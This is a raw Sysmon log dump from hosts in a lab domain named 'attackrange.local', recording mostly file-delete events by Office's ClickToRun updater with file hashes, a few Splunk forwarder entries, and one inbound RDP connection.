23542300x800000000000000068731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.ReportingServices.ReportDesign.Forms.dllMD5=7DD2A2701D77B3EE2AD658252711E106,SHA256=8226A608BA03D14B28CEBC7AB3432488A8BBBD342F9359316BFDB4857628D25F,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.ReportingServices.ReportDesign.Common.dllMD5=DF960219BB714E3E5853786A0A4E345C,SHA256=65EF278F281B66576149B938663E52F47672556FBD1BBFA3CC09875A77E20930,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.ReportingServices.Interfaces.dllMD5=EB204F0532982306C489DBF680AB13A2,SHA256=78084A10155CC89179FC25D82667DE79A4F2E9626002A111644FE24456969D25,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.ReportingServices.Diagnostics.dllMD5=F8F1905C2890B47D49BBE6C4010DF50A,SHA256=1A782B6D8EFB911232BFA4FC22B47C084CE84D8CC528D528D53070C6DD0C657E,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Office.PowerPivot.ExcelAddIn.tlbMD5=BD5647359C3B7679E35CC3A73B702DBE,SHA256=196C929E4277F7E55E89704FCEED847236E17A7C5E3EEE974796EE7B3D20A38E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Office.PowerPivot.ExcelAddIn.dllMD5=7BFAEBAD0F914B34019C7DB7B668B2DB,SHA256=3CA0E8FEC6135B7A59A7CC524566361EC8EB319D78774EC1607D9DE39F41CD17,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Office.Interop.Excel.dllMD5=574D91266EE9FA03432CF50DA30DD232,SHA256=6F262BBA82EED8A8D69FAC44E491B99CCA2D4CD448166291CE2186833E730A85,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Excel.ReportingServices.QueryDesigners.Extensions.dllMD5=7331A61967BC51C669AC52C54520D00C,SHA256=09A1BE15F951F8B3BB2CFAE789E8AF883DE7919D80745DA1605AD187D876AD40,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Excel.ReportingServices.QueryDesigners.dllMD5=5DEFD6E12AFE344569EB6F2F69A54BC4,SHA256=5774D63540CE03183DA902DA6266FED89EABC2A2358B4F89029D7A7D05D6AF54,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Excel.ReportingServices.DataExtensions.dllMD5=6BC71E8CD794F47CBE2B1756B711155F,SHA256=95A197D6E754816A718A127421383137EF32269023D2FEBF906DEFAFF9990028,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Excel.MDXQueryGenerator.dllMD5=A626090B3A1727A0A666886422813C2C,SHA256=7F74E3769AEBBADABD48FD646403F082EB00913DE28DCF4162A94A89A355244B,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Excel.DataWarehouse.dllMD5=D132598A60945CDAAAFAD7EBF322D24E,SHA256=AC0B0BC7F776607D758ADD0593C12487754664DA20034D94D18950B8AE2D3459,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Excel.AnalysisServices.AdomdClientUI.dllMD5=50B679FF7C7CDA4384090809A1078D36,SHA256=D92863ABF7E7E63C2A4B491FD02D3C5846EE15B35E3C5BEF1E9CB3884FC2E955,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.DataWarehouse.Interfaces.DLLMD5=FCB779228BF0AC0DAA5AFEB41141762E,SHA256=0288EE487D1CE7C11D04A7C4748FB7520131188ED0AD78B1571B767316CA7339,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.DataWarehouse.DLLMD5=7D03C05B92B2CE41C092CE0B083F690C,SHA256=03E50B1D512EEB3A6AE37742D37A902CBDEF5D9DDA186E59B07882C77BA57EE3,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Data.Recommendation.Common.dllMD5=A32DD65DC52AF40E59213D13FD16A555,SHA256=0159872FE66AB711C238AF3544128DB53A4271F1873A8DB232DEE4841B4A4DC1,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Data.Recommendation.Client.Picasso.Sampler.dllMD5=D37052A760F3345F4BCBEA7C6898E001,SHA256=D318096E3D8FDF1BD4F9F89C04FF11021B2D2B4D9D164D98F95363FA9992D654,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Data.Recommendation.Client.Picasso.dllMD5=558DABF67C26935376F6658304CE0AE3,SHA256=88519D08E2C63FA008580252048684E86CF2104FEA65FF0B8208E400A425BD8D,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Data.Recommendation.Client.Core.dllMD5=69FBA049874095F2CED232831E1FCE94,SHA256=9D4DD2E162862BCBA6D107C0787458824E3FBDF875ECFC6C3C15CA77847A25BF,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Data.ConnectionUI.dllMD5=A1E4D4344104CA4D3484010A84B50E7B,SHA256=0DDD718A638790941969B634724D74ED8763C336BA7720377586A2E24B4E36E2,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Data.ConnectionUI.Dialog.dllMD5=9834A594316521380027C0F0D5F93E94,SHA256=9B0CAB434A6DD3B7BCA2D7E027F51987F9CE0B7A54D85CF44E37F6E7C6E06A2F,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Dallas.OAuthClient.dllMD5=0224E98B0175B10B377DE4A6D5612D12,SHA256=00B86644892A7AF2BEABAEAC257886C420C7CAAF747FFBF1267A4C1EFB6E5620,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.XLHost.Modeler.dllMD5=D7505FECC0685356F585F0FB1F2F807B,SHA256=E8C0B39369F8D3922C028AB0788ACF686952CED722E1E6C358692755AB1F24D3,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.SPClient.Interfaces.DLLMD5=C20E8C1D7EFC9F300C6B87AA08509F34,SHA256=BDD784F5D552F08610922ABC9761D8AEF2D786980C9C91A54B62D6F74CE582BE,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.Modeler.UI.rllMD5=6F9E92F70E51EB76629D55658636F2CE,SHA256=3D8D861F95D90D7A2817C5D458978F61DB41DE5F67FD9FD27521B68380BBB17F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.Layout.dllMD5=EDEB07A5B32C929E51DEDEC7D213AC9E,SHA256=EF8EB23A924BE610C33D36D194D599E76F01EDAFC9D9AB27C50AD80484636481,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.Excel.Common.FrontEnd.XmlSerializers.dllMD5=DD06C6DBBAF2B1AB41070053069E666D,SHA256=0960C157053E0A5E438CDF284A8ED6DA76A74B657F6BCDB7EA4299D45AE29948,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 354300x800000000000000049747Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:18.742{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63338-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049746Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:20.815{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2780646EE192347728414D1177C152A6,SHA256=A0C988E33B1D62A48594DA3DE0166C0CA12F4C6421AD3C63D5A4DBC33DF0555B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049745Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:20.815{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A10CA08714806E943A105F538B533334,SHA256=A0063D0D491B4E0ED288089FC7BD7AB1E375AA5D2EA35A3B6CB5878E669DE2AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Redshift\lib\OpenSSL64.DllA\ssleay32.dllMD5=E04D2070B3ADD29166A0133D8B2F4E82,SHA256=D63589D1CE474C30E91B1BD60566D79967F3A651498BB7F1E697015CC56EB5F0,IMPHASH=1510A4E65159E2632E44C4D9A48ED4F5truetrue 23542300x800000000000000069269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Redshift\lib\OpenSSL64.DllA\openssl64.dlla.manifestMD5=1A779FDAADC7F3E0F315E82D290D774A,SHA256=55DCDD1FF714855C23EA434DCD7FE9C622FA194F6370B3DD8AB5662F81BBD35C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Redshift\lib\OpenSSL64.DllA\libeay32.dllMD5=05C1E78D28B70D089D7610FC0467895F,SHA256=631E20C9DF816D4726BAC174D659993B01554C467A1801CC64941EFBB0E4CA7B,IMPHASH=7FBE30BC11B896C138D6EA87C3B12402truetrue 23542300x800000000000000069267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\ThirdPartyNotices.txtMD5=BC5CDEC4C7696AACE444A7E5987206A6,SHA256=7B3AE543BB5DE5BF4E106585DB7588E8150F8F85035B862ADADDF2C780360B98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\MSIPCEvents.manMD5=27BE4F869C8FB167596900CF2FA6209C,SHA256=04DD059934D98733E5071AF69D85D431A6809E85C7DEB796B1294CFD6B9D7298,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\msipc.dllMD5=79CF43E10FC2DEB9A66832A481980A6A,SHA256=0A5FDCE4DF33D8DCD11912DBCF70C59B0775EBB9A9D095080E0B823E907269C8,IMPHASH=99437F4E5C9C86B1617DDF286AF2156Atruetrue 23542300x800000000000000069264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\ipcsecproc.dllMD5=1886CB62899972489D2AAD45C9677F07,SHA256=228295FCE22A581558575BBF912E386775EE55858A566BFCAC743C446F2BFB7A,IMPHASH=6F23A9EE83C390A83F672AEB75EB847Etruetrue 23542300x800000000000000069263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\zh-TW\msipc.dll.muiMD5=106EB9B7696A371B53BA78F49AD66944,SHA256=1D11F110E80C6A7CC886DAB071D32537B6B715A5A8430BF06FC1000520C486BC,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\zh-CN\msipc.dll.muiMD5=BC3A7461E502C5B26FCA975B4D951E23,SHA256=09086BBC7358EEFEA6A14A7A241B7CA2D4D52853B193539DDF19CB456647D9E1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\vi\msipc.dll.muiMD5=F35EA62FB2479B8A8323DA85884EAFAC,SHA256=349B0D5ADDBDB59CE95ADA1BBF5532C286F081FF962BF5BC30611C680AA18C2F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\uk\msipc.dll.muiMD5=A59EA9D16B616E8BE3E077A74BC6928C,SHA256=A2D1C7DF867C4A42DC792B6E03B3488E7D68AE5FAD86478EB4BD7A4BF6667581,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\tr\msipc.dll.muiMD5=4CC39FD2F238DB3B97445E3C25B060F6,SHA256=38439E06E6BE23A07B9F423268D72D9A3490DAE8482C752CB14DF7AD9A551C95,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 